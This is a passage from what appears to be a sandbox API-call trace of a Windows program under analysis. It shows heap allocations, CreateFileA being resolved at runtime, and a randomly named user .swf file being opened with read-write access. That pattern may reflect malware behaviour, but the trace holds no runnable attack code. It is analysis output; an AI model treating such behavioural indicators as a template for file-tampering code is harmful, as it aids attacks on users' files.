hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0043.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0043.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0043.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.633] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.636] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0043.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889220 [0043.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889220, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0043.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.636] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0043.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889220 [0043.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889220, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0043.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.636] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0043.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0043.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf", cchWideChar=77, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 77 [0043.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4d) returned 0x7f36e0 [0043.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf", cchWideChar=77, lpMultiByteStr=0x7f36e0, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf", lpUsedDefaultChar=0x0) returned 77 [0043.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0043.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.638] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\ou4nop2hd11p9km.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0043.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=77, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0043.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9a) returned 0x7d8558 [0043.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=77, lpWideCharStr=0x7d8558, cchWideChar=77 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf") returned 77 [0043.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0043.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0043.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0043.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0043.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0043.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0043.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0043.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0043.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.640] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 